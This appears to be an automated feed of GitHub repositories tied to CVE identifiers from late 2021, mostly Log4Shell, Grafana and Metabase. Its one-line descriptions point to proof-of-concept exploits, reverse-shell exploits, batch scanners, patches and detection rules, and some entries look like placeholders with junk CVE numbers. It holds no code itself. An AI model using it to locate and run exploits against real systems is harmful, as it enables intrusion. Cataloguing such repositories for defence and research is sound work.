Scans files for .jars potentially vulnerable to Log4Shell (CVE-2021-44228) by inspecting the class paths inside the .jar. : 1lann/log4shelldetect create time: 2021-12-11T01:08:00Z
no description : racoon-rac/CVE-2021-44228 create time: 2021-12-10T23:37:55Z
Java Agent that disables Apache Log4J's JNDI Lookup. Quick-fix for CVE-2021-44228 : alerithe/log4j-patcher create time: 2021-12-10T21:59:31Z
Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam : Adikso/minecraft-log4j-honeypot create time: 2021-12-10T23:35:31Z
Buildpack providing a workaround for CVE-2021-44228 (Log4j RCE exploit) : alexandreroman/cve-2021-44228-workaround-buildpack create time: 2021-12-10T23:34:52Z
A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. : kozmer/log4j-shell-poc create time: 2021-12-10T23:19:28Z
🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches : Puliczek/CVE-2021-44228-PoC-log4j-bypass-words create time: 2021-12-10T22:35:00Z
Simple Python 3 script to detect the Java library "Log4j" vulnerability (CVE-2021-44228) for a list of URLs : takito1812/log4j-detect create time: 2021-12-10T21:46:18Z
no description : greymd/CVE-2021-44228 create time: 2021-12-10T17:24:47Z
no description : LongWayHomie/CVE-2017-12617 create time: 2021-12-10T22:21:07Z
CVE-2021-44228 DFIR Notes : Azeemering/CVE-2021-44228-DFIR-Notes create time: 2021-12-10T22:19:16Z
list of ips pulled from greynoise for this : seamus-dev/CVE-2021-44228 create time: 2021-12-10T21:41:12Z
log4shell sample application (CVE-2021-44228) : StandB/CVE-2021-44228-poc create time: 2021-12-10T21:13:46Z
Mitigation for Log4Shell Security Vulnerability CVE-2021-44228 : izzyacademy/log4shell-mitigation create time: 2021-12-10T20:39:56Z
no description : wheez-y/CVE-2021-44228-kusto create time: 2021-12-10T19:53:32Z
CVE-2021-44228 server-side fix for minecraft servers. : OopsieWoopsie/mc-log4j-patcher create time: 2021-12-10T19:25:31Z
Hashes for vulnerable LOG4J versions : mubix/CVE-2021-44228-Log4Shell-Hashes create time: 2021-12-10T18:06:06Z
RCE POC : KosmX/CVE-2021-44228-example create time: 2021-12-10T17:13:18Z
no description : R00tendo/CVE-2012-2982 create time: 2021-12-10T15:29:07Z
Patch Pulsar Docker images with Log4J 2.15.0 update to mitigate CVE-2021-44228 : lhotari/pulsar-docker-images-patch-CVE-2021-44228 create time: 2021-12-10T15:46:49Z
tcpshield wasiresolver!? : racisz/CVE-2021-44228-test create time: 2021-12-10T15:39:09Z
no description : sohtsuka/CVE-2021-44228-PoC create time: 2021-12-10T14:57:55Z
Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell. : christophetd/log4shell-vulnerable-app create time: 2021-12-10T12:38:20Z
A small server for verifing if a given java program is succeptibel to CVE-2021-44228 : zlepper/CVE-2021-44228-Test-Server create time: 2021-12-10T12:35:30Z
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process : simonis/Log4jPatch create time: 2021-12-10T10:10:19Z
Plugin which fixes 0day exploit (CVE-2021-44228) with Log4j apache package : Szczurowsky/Log4j-0Day-Fix create time: 2021-12-10T09:43:49Z
CVE-2021-44228 fix : DragonSurvivalEU/RCE create time: 2021-12-10T09:20:40Z
Remote Code Injection In Log4j : y35uishere/Log4j2-CVE-2021-44228 create time: 2021-12-10T07:18:15Z
一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense. : boundaryx/cloudrasp-log4j2 create time: 2021-12-10T06:42:37Z
Apache Log4j 2 a remote code execution vulnerability via the ldap JNDI parser. : dbgee/CVE-2021-44228 create time: 2021-12-10T06:59:10Z
Log4j-RCE (CVE-2021-44228) : HyCraftHD/Log4J-RCE-Proof-Of-Concept create time: 2021-12-10T06:15:38Z
Remote Code Injection In Log4j : jas502n/Log4j2-CVE-2021-44228 create time: 2021-12-10T05:23:44Z
Patch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2 : Glease/Healer create time: 2021-12-09T21:49:33Z
A spigot plugin to fix CVE-2021-44228 Log4j remote code execution vulnerability, to protect Minecraft clients. : UltraVanilla/LogJackFix create time: 2021-12-10T04:20:03Z
This tool patches the CVE-2017-5645 Log4J vulnerability present in all minecraft versions NOTE THIS TOOL MUST BE RE-RUN after downloading or updating versions of minecraft as its not a perminent patch : jacobtread/L4J-Vuln-Patch create time: 2021-12-10T00:14:06Z
Exploit iDRAC 7 & 8 firmware < 2.52.52.52 : mgargiullo/cve-2018-1207 create time: 2021-12-09T23:47:22Z
no description : M-ensimag/CVE-2019-18276 create time: 2021-12-09T20:22:01Z
update to Daniele Scanu's SQL Injection Exploit - CVE-2019-9053 : Marbocatcat/46635.py create time: 2021-12-09T17:39:15Z
PoC of FortiWAN auth bypass (https://www.fortiguard.com/psirt/FG-IR-21-048) : SleepyCofe/CVE-2021-26102 create time: 2021-12-09T12:55:30Z
CVE-2021-43798Exp多线程批量验证脚本 : fanygit/Grafana-CVE-2021-43798Exp create time: 2021-12-09T11:25:47Z
CVE-2021-27928-POC : shamo0/CVE-2021-27928-POC create time: 2021-12-09T11:18:26Z
no description : julesbozouklian/CVE-2021-43798 create time: 2021-12-09T10:17:57Z
Grafana-POC任意文件读取漏洞(CVE-2021-43798) : culprits/Grafana_POC-CVE-2021-43798 create time: 2021-12-09T09:53:25Z
Simple program for exploit grafana : z3n70/CVE-2021-43798 create time: 2021-12-09T09:48:40Z
CVE-2021-38759 public Exploit : joanbono/CVE-2021-38759 create time: 2021-12-08T21:17:31Z
Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077 : horizon3ai/CVE-2021-44077 create time: 2021-12-08T20:24:38Z
no description : RamPanic/CVE-2019-19609-EXPLOIT create time: 2021-12-08T15:38:20Z
no description : s1gh/CVE-2021-43798 create time: 2021-12-08T14:14:38Z
*Grafanav8.版本任意文件读取漏洞poc&exp,该漏洞目前为0day漏洞,未授权的攻击者利用该漏洞,能够获取服务器敏感文件。 : asaotomo/Grafana-V8.0-exp-CVE-2021-43798-arbitrary-file-reading-vulnerability create time: 2021-12-07T14:06:26Z
CVE-2021-43798-Grafana任意文件读取漏洞 : lfz97/CVE-2021-43798-Grafana-File-Read create time: 2021-12-08T07:08:37Z
Grafana File-Read Vuln : JiuBanSec/Grafana-CVE-2021-43798 create time: 2021-12-08T07:06:58Z
Grafana Unauthorized arbitrary file reading vulnerability : jas502n/Grafana-CVE-2021-43798 create time: 2021-12-07T09:02:16Z
no description : j-jasson/CVE-2021-43798-grafana_fileread create time: 2021-12-08T03:43:31Z
Python Exploit Code : scopion/CVE-2021-43799 create time: 2021-12-08T00:47:00Z
grafana-fileread-0day-poc : Yang-Zhongshan/grafana-fileread-0day-poc-CVE-2021-43798 create time: 2021-12-07T13:48:01Z
Python Exploit Code : darkerego/CVE-2021-43798 create time: 2021-12-08T00:36:04Z
利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。 : kenuosec/grafanaExp create time: 2021-12-07T16:39:09Z
CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth) : taythebot/CVE-2021-43798 create time: 2021-12-06T20:10:23Z
no description : phrantom/cve-2021-38314 create time: 2021-12-07T15:39:04Z
利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。 : A-D-Team/grafanaExp create time: 2021-12-07T15:11:34Z
Grafana Arbitrary File Reading Vulnerability : zer0yu/CVE-2021-43798 create time: 2021-12-07T08:59:11Z
CVE-2021-43798:Grafana 任意文件读取漏洞 : Mr-xn/CVE-2021-43798 create time: 2021-12-07T12:47:58Z
no description : tangxiaofeng7/CVE-2021-43798-Grafana-File-Read create time: 2021-12-07T08:28:56Z
druid未授权访问批量扫描poc : MzzdToT/CVE-2021-34045 create time: 2021-12-07T06:58:15Z
reverse shell execution exploit of CVE 22204 : Asaad27/CVE-2021-22204-RSE create time: 2021-12-06T21:53:55Z
no description : thpless/CVE-2018-6574 create time: 2021-12-06T20:14:43Z
CVE-2021-43471 : cxaqhq/CVE-2021-43471 create time: 2021-11-03T10:27:16Z
CVE-2021-43469 : badboycxcc/CVE-2021-43469 create time: 2021-11-03T03:54:14Z
no description : zer0yu/CVE-2021-41277 create time: 2021-12-06T08:52:32Z
A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157. : 0xInfection/PewSWITCH create time: 2021-11-28T13:12:38Z
CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation) : fumamatar/NimNightmare create time: 2021-12-05T14:49:32Z
N-DAY VULNERABILITY RESEARCH (FROM PATCH TO EXPLOIT ANALYSIS OF CVE-2021-41081) : sudaiv/CVE-2021-41081 create time: 2021-12-05T05:22:08Z
Microsoft Exchange ProxyLogon PoC (CVE-2021-26855) : thau0x01/poc_proxylogon create time: 2021-12-04T22:38:30Z
Unauthenticated Sensitive Information Disclosure (CVE-2021–38314). : oxctdev/CVE-2021-38314 create time: 2021-12-04T17:08:05Z
CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver : 0xdevil/CVE-2021-42008 create time: 2021-12-03T14:08:26Z
Python tool for exploiting CVE-2021-35616 : Ofirhamam/OracleOTM create time: 2021-12-03T13:22:19Z
D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the DHE key exchange. : Balasys/dheater create time: 2021-08-31T09:51:12Z
Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver : numanturle/CVE-2021-42008 create time: 2021-12-03T13:18:32Z
a python3 version of the exploit written for CVE-2014-6287. Useful for completing the "Steel Mountain" room on TryHackMe.com without the use of metasploit. : Mr-Intern/thm_steelmountain_CVE-2014-6287 create time: 2021-12-03T12:13:35Z
no description : sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP create time: 2021-12-03T12:30:07Z
no description : Nivaskumark/CVE-2019-9367_system_bt create time: 2021-12-03T11:34:45Z
no description : Nivaskumark/CVE-2019-9367_system_bt__ create time: 2021-12-03T11:25:45Z
no description : MaximeSchlegel/CVE-2021-32724-Target create time: 2021-12-03T12:09:46Z
CVE 2021-37832 poc : AK-blank/CVE-2021-37832 create time: 2021-12-03T07:35:02Z
A vulnerability scanner that detects CVE-2021-21980 vulnerabilities. : Osyanina/westone-CVE-2021-21980-scanner create time: 2021-12-03T02:30:14Z
Plex media server local privilige escalation poc - CVE-2021-42835 : netanelc305/PlEXcalaison create time: 2021-12-02T20:18:08Z
no description : infobyte/Exploit-CVE-2021-21086 create time: 2021-12-02T18:30:53Z
A write up on the Steel Mountain box from TryHackMe.com and exploit for CVE-2014-6287 : SlizBinksman/THM-Steel_Mountain-CVE-2014-6287 create time: 2021-12-02T15:15:09Z
no description : dearpan/cve-2018-9995 create time: 2021-12-02T07:52:28Z
CVE-2021-42325 POC : AK-blank/CVE-2021-42325- create time: 2021-12-02T06:56:02Z
Gex is an iOS 14.7 jailbreak using CVE-2021-30807 IOMFB exploit : 30440r/gex create time: 2021-11-30T14:56:04Z
no description : listenquiet/cve-2017-2824-reverse-shell create time: 2021-11-30T09:42:25Z
CVE-2021-43778 poc : AK-blank/CVE-2021-43778 create time: 2021-11-30T08:19:24Z
https://github.com/zhongjiao01/cve-2021-21 : zhongjiao01/test create time: 2021-11-30T06:42:29Z
Sigma-Rule-for-CVE-2021-40438-Attack-Attemp : pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt create time: 2021-11-30T06:07:49Z
Script in python detecting malious office document : YxZi5/Detection-CVE_2021_40444 create time: 2021-11-29T16:32:23Z
Shell code for CVE-2020-7247-POC : SimonSchoeni/SimonSchoeniCVE20207247.github.io create time: 2021-11-29T14:04:07Z
攻击WIFI的常用方式 : fengchenzxc/CVE-2020-28148 create time: 2021-11-29T08:38:27Z
no description : Nivaskumark/CVE-2020-0074-frameworks_base create time: 2021-11-29T07:13:33Z
Gerapy clone background remote command execution : ohnonoyesyes/CVE-2021-32849 create time: 2021-11-29T06:39:27Z
no description : Nivaskumark/CVE-2020-0074-frameworks_base create time: 2021-11-29T06:18:01Z
no description : Nivaskumark/CVE-2020-0097-frameworks_base create time: 2021-11-29T04:00:19Z
no description : Nivaskumark/CVE-2020-0097-frameworks_base create time: 2021-11-29T03:12:16Z
no description : Nivaskumark/CVE-2020-0114-frameworks_base create time: 2021-11-29T02:27:53Z
no description : Nivaskumark/CVE-2020-0114-frameworks_base_before create time: 2021-11-29T01:37:12Z
Exploit for CVE-2021-30807 : jsherman212/iomfb-exploit create time: 2021-10-09T20:11:42Z
CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day : exploitblizzard/WindowsMDM-LPE-0Day create time: 2021-11-28T09:48:36Z
no description : sg552/demo_cve_2020-8184 create time: 2021-11-28T09:13:23Z
TP-Link TL-WR840N EU v5 Remote Code Execution : ohnonoyesyes/CVE-2021-41653 create time: 2021-11-28T01:15:36Z
ARM64 PoC for CVE-2021-21224 : ohnonoyesyes/CVE-2021-21224 create time: 2021-11-28T01:10:54Z
Strapi Framework, 3.0.0-beta.17.4 : xda3m00n/CVE-2019 create time: 2021-11-27T13:58:18Z
Windows MDM LPE : ohnonoyesyes/CVE-2021-24084 create time: 2021-11-27T00:37:07Z
no description : r1l4-i3pur1l4/CVE-2021-21042 create time: 2021-11-26T21:31:18Z
Proof of concept for CVE-2020-7247 for educational purposes. : SimonSchoeni/CVE-2020-7247-POC create time: 2021-11-26T17:28:56Z
no description : Nivaskumark/CVE-2020-0114-frameworks_base create time: 2021-11-26T12:58:16Z
CVE-2021-40865 : hktalent/CVE-2021-40865 create time: 2021-11-26T10:09:40Z
no description : Nivaskumark/CVE-2020-0097-frameworks_base create time: 2021-11-26T07:41:02Z
no description : Nivaskumark/CVE-2020-0114-frameworks_base create time: 2021-11-26T07:19:26Z
no description : Nivaskumark/CVE-2020-0114-frameworks create time: 2021-11-26T07:07:13Z
CVE-2021-1347 : givemefivw/CVE-2021-1347 create time: 2021-11-26T07:18:50Z
CVE-2021-41773 Test Page & Exploit Code : jhye0n/CVE-2021-41773 create time: 2021-11-26T04:54:16Z
Detect with python and tracking IP : vphnguyen/ANM_CVE-2018-7600 create time: 2021-11-26T03:25:50Z
CVE-2019-6249 Hucart cms 复现环境 : AlphabugX/CVE-2019-6249_Hucart-cms create time: 2019-02-21T08:03:43Z
no description : Nivaskumark/CVE-2020-0133-packages_apps_Settings create time: 2021-11-26T03:17:14Z
no description : Nivaskumark/CVE-2020-0133-packages_apps_Settings_final create time: 2021-11-26T03:08:47Z
no description : Nivaskumark/CVE-2020-0133-packages_apps_Settings create time: 2021-11-26T01:29:58Z
Local PoC exploit for CVE-2021-43267 (Linux TIPC) : ohnonoyesyes/CVE-2021-43267 create time: 2021-11-26T01:51:57Z
no description : Nivaskumark/CVE-2020-0074-frameworks_base create time: 2021-11-25T16:17:23Z
no description : Nivaskumark/CVE-2020-0074-frameworks_base_old create time: 2021-11-25T16:02:52Z
no description : Nivaskumark/CVE-2020-0097-frameworks_base_after create time: 2021-11-25T15:47:33Z
no description : Nivaskumark/CVE-2020-0097-frameworks_base_before create time: 2021-11-25T15:29:28Z
no description : Nivaskumark/CVE-2020-0114-frameworks_base create time: 2021-11-25T15:13:33Z
no description : Nivaskumark/_beforeCVE-2020-0114-frameworks_base create time: 2021-11-25T15:04:14Z
no description : Nivaskumark/CVE-2020-0133-packages_apps_Settings create time: 2021-11-25T14:49:20Z
no description : Nivaskumark/CVE-2020-0133-packages_apps_Settings_nopatch create time: 2021-11-25T14:38:58Z
A CVE-2021-22205 Gitlab RCE POC written in Golang : pizza-power/Golang-CVE-2021-22205-POC create time: 2021-11-25T12:47:27Z
A GitHub Action to find Unicode control characters using the Red Hat diagnostic tool https://access.redhat.com/security/vulnerabilities/RHSB-2021-007 to detect RHSB-2021-007 Trojan source attacks (CVE-2021-42574,CVE-2021-42694) : pierDipi/unicode-control-characters-action create time: 2021-11-25T08:02:31Z
CVE-2021-41773 on Docker : ahmad4fifz/CVE-2021-42013 create time: 2021-11-25T09:07:00Z
no description : lisinan988/CVE-2017-11882-exp create time: 2021-11-25T05:03:46Z
no description : lisinan988/CVE-2018-8174-exp create time: 2021-11-25T05:06:25Z
no description : lisinan988/CVE-2019-0708-scan create time: 2021-11-25T04:53:22Z
no description : lisinan988/CVE-2020-0796-exp create time: 2021-11-25T04:59:48Z
no description : lisinan988/CVE-2021-40444-exp create time: 2021-11-25T05:13:05Z
no description : lisinan988/CVE-2021-24086-exp create time: 2021-11-25T04:56:33Z
no description : Hyperkopite/CVE-2021-44217 create time: 2021-11-25T01:24:58Z
Metabase GeoJSON map local file inclusion : TheLastVvV/CVE-2021-41277 create time: 2021-11-24T05:56:46Z
Python 3 script to identify CVE-2021-26084 via network requests. : quesodipesto/conflucheck create time: 2021-11-23T19:45:31Z
no description : Vulnmachines/Metabase_CVE-2021-41277 create time: 2021-11-23T18:01:23Z
POC to test the BootROM vulnerability found in LPC55S69 and K82 Series : Xen1thLabs-AE/CVE-2021-40154 create time: 2021-11-23T15:44:42Z
Icewarp Mail Server 12.3.0.1 insecure_permissions : pinpinsec/CVE-2020-14066 create time: 2021-11-23T14:02:54Z
Icewarp Mail Server 12.3.0.1 unlimited_file_upload : pinpinsec/CVE-2020-14065 create time: 2021-11-23T13:53:45Z
Icewarp Mail Server 12.3.0.1 incorrect_access_control : pinpinsec/CVE-2020-14064 create time: 2021-11-23T13:42:56Z
no description : hlong12042/CVE_2019_11043 create time: 2021-11-23T09:14:21Z
plugin made for LeakiX : kaizensecurity/CVE-2021-41277 create time: 2021-11-23T06:24:16Z
Microsoft Exchange Server Poc : DarkSprings/CVE-2021-42321 create time: 2021-11-23T02:26:26Z
PoC for CVE-2021-43557 : xvnpw/k8s-CVE-2021-43557-poc create time: 2021-11-22T20:23:05Z
CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability : Vulnmachines/CVE-2021-22053 create time: 2021-11-22T18:26:16Z
simple program for exploit metabase : z3n70/CVE-2021-41277 create time: 2021-11-22T18:06:11Z
A write up on the THM room Vulnerability Capstone & Exploit script for CVE-2018-16763. : SlizBinksman/THM-Vulnerability_Capstone-CVE-2018-16763 create time: 2021-11-22T14:53:42Z
A demo of exploiting CVE-2021-40531, a vulnerability in Sketch. : jonpalmisc/CVE-2021-40531 create time: 2021-11-19T17:38:34Z
no description : Alexcot25051999/CVE-2021-40444 create time: 2021-11-22T13:29:20Z
MetaBase 任意文件读取漏洞 fofa批量poc : kap1ush0n/CVE-2021-41277 create time: 2021-11-22T12:49:42Z
MetaBase 任意文件读取漏洞 fofa批量poc : Hum0r/CVE-2021-41277 create time: 2021-11-22T12:30:36Z
no description : je6k/CVE-2021-34473-Exchange-ProxyShell create time: 2021-11-22T07:47:09Z
Metabase 任意文件读取 : Henry4E36/Metabase-cve-2021-41277 create time: 2021-11-22T02:51:49Z
no description : tahtaciburak/CVE-2021-41277 create time: 2021-11-21T11:38:08Z
Metabase信息泄露批量扫描脚本 : Seals6/CVE-2021-41277 create time: 2021-11-21T11:04:44Z
I try write it with rust-lang : Ki11i0n4ir3/CVE-2021-21315 create time: 2021-11-10T06:40:17Z
Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053 : SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 create time: 2021-11-21T08:47:56Z
no description : ypl6/cve-demo-2020-8287 create time: 2021-11-21T05:16:41Z
Crawl MS numbers and CVEs from 2015 -2016 : Arsham1024/CVE_Crawler create time: 2021-11-21T04:15:26Z
CVE-2021-36749 Docker 漏洞复现 : zwlsix/apache_druid_CVE-2021-36749 create time: 2021-11-21T03:23:00Z
Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy)… : FoxxD3Vza/adamyordan create time: 2021-11-20T03:06:01Z
Apache ShenYu 管理员认证绕过 : Wing-song/CVE-2021-37580 create time: 2021-11-19T13:59:26Z
CVE-2021-37580 : Liang2580/CVE-2021-37580 create time: 2021-11-19T09:00:37Z
no description : ZororoZ/CVE-2021-37580 create time: 2021-11-19T08:21:44Z
A vulnerability scanner that detects CVE-2021-37580 vulnerabilities. : Osyanina/westone-CVE-2021-37580-scanner create time: 2021-11-19T06:49:35Z
CVE-2021-43617 bypass CRF : kombat1/CVE-2021-43617 create time: 2021-11-19T05:39:25Z
Site Editor WordPress Plugin <= 1.1.1 Local File Inclusion Script : jessisec/CVE-2018-7422 create time: 2021-11-18T21:52:11Z
CVE-2013-2171 : Gabriel-Lima232/FreeBSD-9.0-9.1---Privilege-Escalation create time: 2021-11-18T12:25:10Z
no description : KAB8345/CVE-2021-26411 create time: 2021-11-18T08:26:37Z
PoC for CVE-2017-17562 written in bash : freitzzz/bash-CVE-2017-17562 create time: 2021-11-17T18:21:54Z
CVE-2021-37580的poc : fengwenhua/CVE-2021-37580 create time: 2021-11-17T13:26:46Z
Demonstration of CVE-2018-19571: GitLab SSRF CVE : CS4239-U6/gitlab-ssrf create time: 2021-11-16T13:45:06Z
An example of CVE-2020-7740 : CS4239-U6/node-pdf-generator-ssrf create time: 2021-11-11T10:53:10Z
no description : rabbitsafe/CVE-2021-37580 create time: 2021-11-17T08:33:25Z
PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection) : nth347/CVE-2020-28032_PoC create time: 2021-11-17T07:09:47Z
cve-2020-35314,一个带phpcode的zip文件 : ybdegit2020/wonderplugin create time: 2021-11-17T02:39:06Z
no description : tomquinn8/CVE-2011-5331 create time: 2021-11-16T16:49:04Z
CVE-2020-0787的简单回显 : yanghaoi/CVE-2020-0787 create time: 2021-11-16T11:04:42Z
no description : nth347/CVE-2018-20148_exploit create time: 2021-11-16T07:19:47Z
A write up on the TryHackMe room Source & a python script to exploit the vulnerability : SlizBinksman/THM-Source-CVE-2019-15231 create time: 2021-11-15T15:23:05Z
poc for CVE-2020-2555 : Qynklee/POC_CVE-2020-2555 create time: 2021-11-15T09:06:42Z
POC for CVE-2020-2883 : Qynklee/POC_CVE-2020-2883 create time: 2021-11-15T08:56:44Z
Repo demonstrating CVE-2021-43616 / npm/cli#2701 : icatalina/CVE-2021-43616 create time: 2021-11-15T01:06:10Z
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked. : fssecur3/goahead-rce-exploit create time: 2021-11-14T14:30:10Z
no description : xMohamed0/CVE-2020-5504-phpMyAdmin create time: 2021-11-14T14:54:04Z
no description : xMohamed0/CVE-2021-42013-ApacheRCE create time: 2021-11-14T14:58:26Z
no description : xMohamed0/CVE-2021-21315-POC create time: 2021-11-14T14:52:25Z
no description : xMohamed0/CVE-2021-41773 create time: 2021-11-14T14:50:45Z
针对 CVE-2020-7699 的复现,软件安全原理课程大作业 : hemaoqi-Tom/CVE-2020-7699_reproduce create time: 2021-11-14T14:07:17Z
Dummy github repo for CVE-2021-32724 vulnerability exploit testing : MaximeSchlegel/AMUM2-CVE-2021-32724-Target create time: 2021-11-14T14:06:18Z
CVE-2021-41351-poc : JaneMandy/CVE-2021-41351-POC create time: 2021-11-14T09:14:56Z
no description : simon242/CVE-2021-42013 create time: 2021-11-14T08:43:55Z
CSP Playground for CVE-2021-30682 : threatnix/csp-playground create time: 2021-10-15T08:10:02Z
no description : kubota/POC-CVE-2021-41773 create time: 2021-11-14T02:02:45Z
no description : redteambrasil/CVE-2019-19550 create time: 2021-11-13T20:32:49Z
no description : redteambrasil/CVE-2020-24030 create time: 2021-11-13T20:42:31Z
no description : redteambrasil/CVE-2020-24029 create time: 2021-11-13T20:39:59Z
no description : redteambrasil/CVE-2020-24028 create time: 2021-11-13T20:37:12Z
Python script to exploit webmin vulnerability cve-2006-3392 : gb21oc/ExploitWebmin create time: 2021-11-13T18:40:15Z
A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to versi… : AjayMT6/UltramanGaia create time: 2021-11-13T12:51:18Z
no description : CppXL/cve-2021-40449-poc create time: 2021-11-12T11:49:10Z
no description : sinjeanmin/cvedetails_2019 create time: 2021-11-12T10:08:31Z
no description : DarkSprings/CVE-2021-38666-poc create time: 2021-11-12T02:21:27Z
Dockerized Proof-of-Concept of CVE-2021-40438 in Apache 2.4.48. : ericmann/apache-cve-poc create time: 2021-11-11T19:51:45Z
This script was written for the 'Intro PoC Scripting' room on TryHackMe.com : SlizBinksman/CVE_2012-2982 create time: 2021-11-11T17:13:17Z
1111111111111111111 : RichardKabuto/CVE-2021-111199 create time: 2021-11-11T06:24:03Z
GitLab CE/EE Preauth RCE using ExifTool : inspiringz/CVE-2021-22205 create time: 2021-11-11T04:34:07Z
仅为测试 : RichardKabuto/CVE-2021-65334 create time: 2021-11-11T03:46:30Z
A Zeek package to detect CVE-2021-42292, a Microsoft Excel local privilege escalation exploit. : corelight/CVE-2021-42292 create time: 2021-11-09T12:14:45Z
这是一个测试而已 : RichardKabuto/CVE-2021-98777 create time: 2021-11-10T15:51:27Z
no description : ahmad4fifz/docker-cve-2021-22205 create time: 2021-11-10T13:57:55Z
2222222 : RichardKabuto/CVE-2021-88888 create time: 2021-11-10T13:38:46Z
1111111 : RichardKabuto/CVE-2021-9876 create time: 2021-11-10T11:58:49Z
no description : RichardKabuto/CVE-2021-99999 create time: 2021-11-10T11:55:22Z
no description : RichardKabuto/CVE-2021-77778 create time: 2021-11-10T10:59:37Z
VMWARE VCENTER SERVER VIRTUAL SAN HEALTH CHECK PLUG-IN RCE (CVE-2021-21985) : sknux/CVE-2021-21985_PoC create time: 2021-11-09T19:06:29Z
no description : faisalfs10x/GitLab-CVE-2021-22205-scanner create time: 2021-11-09T18:19:43Z
Contains the offensive (exploit and auxiliary) modules for the CVE-2021-40444. : Zeop-CyberSec/word_mshtml create time: 2021-11-08T17:38:30Z
A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115. : ctuIhu/CVE-2021-36808 create time: 2021-11-09T07:48:55Z
apache flink目录遍历(CVE-2020-17519) : thebatmanfuture/apacheflink----POC create time: 2021-11-09T04:48:13Z
no description : ahmad4fifz/docker-cve-2021-41773 create time: 2021-11-09T05:13:17Z
This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013). : IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit create time: 2021-11-09T02:38:13Z
trusty poc Provide it to legitimate people : DarkSprings/CVE-2021-43267-POC create time: 2021-11-09T02:14:13Z
no description : Pastea/CVE-2013-2165 create time: 2021-11-08T21:07:35Z
no description : Pastea/CVE-2018-12533 create time: 2021-11-08T21:10:20Z
A sample POC for CVE-2021-30657 affecting MacOS : shubham0d/CVE-2021-30657 create time: 2021-11-07T18:33:35Z
no description : bartutku/CVE-2021-43361 create time: 2021-11-08T13:23:09Z
HAProxy CVE-2021-40346 : Vulnmachines/HAProxy_CVE-2021-40346 create time: 2021-11-08T11:53:45Z
no description : BeneficialCode/CVE-2021-1732 create time: 2021-09-24T01:28:58Z
Exploit for CVE-2021-40449 : Kristal-g/CVE-2021-40449_poc create time: 2021-11-07T16:15:19Z
Python exploit for CVE-2011-2523 (vsftpd 2.3.4) : padsalatushal/vsftpd_2.3.4_Exploit create time: 2021-11-07T06:20:27Z
Checks your files for existence of Unicode BIDI characters which can be misused for supply chain attacks. See CVE-2021-42574 : maweil/bidi_char_detector create time: 2021-11-06T22:12:35Z
no description : Erikten/CVE-2021-3129 create time: 2021-11-06T14:24:54Z
JWT Exploit : mmeza-developer/CVE-2018-0114 create time: 2021-11-06T04:16:10Z
no description : mmeza-developer/CVE-2019-5420-RCE create time: 2021-11-06T04:24:43Z
Pickle Serialization Remote Code Execution - Memcached Poisoning : CarlosG13/CVE-2021-33026 create time: 2021-11-05T18:11:54Z
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution : runsel/GitLab-CVE-2021-22205- create time: 2021-11-05T16:56:06Z
Automated Gitlab RCE via CVE-2021-22205 : X1pe0/Automated-Gitlab-RCE create time: 2021-11-05T16:48:11Z
CVE-2021-42671 - Broken access control vulnerability in the Engineers online portal system. : TheHackingRabbi/CVE-2021-42671 create time: 2021-11-03T21:34:23Z
CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system. : TheHackingRabbi/CVE-2021-42670 create time: 2021-11-03T21:25:43Z
CVE-2021-42669 - Remote code execution via unrestricted file upload vulnerability in the Engineers online portal system. : TheHackingRabbi/CVE-2021-42669 create time: 2021-11-03T20:52:08Z
CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system. : TheHackingRabbi/CVE-2021-42668 create time: 2021-11-03T20:43:30Z
CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system. : TheHackingRabbi/CVE-2021-42667 create time: 2021-11-03T20:31:30Z
CVE-2021-42666 - SQL Injection vulnerability in the Engineers online portal system. : TheHackingRabbi/CVE-2021-42666 create time: 2021-11-03T20:14:58Z
CVE-2021-42665 - SQL Injection authentication bypass vulnerability in the Engineers online portal system. : TheHackingRabbi/CVE-2021-42665 create time: 2021-11-03T19:58:58Z
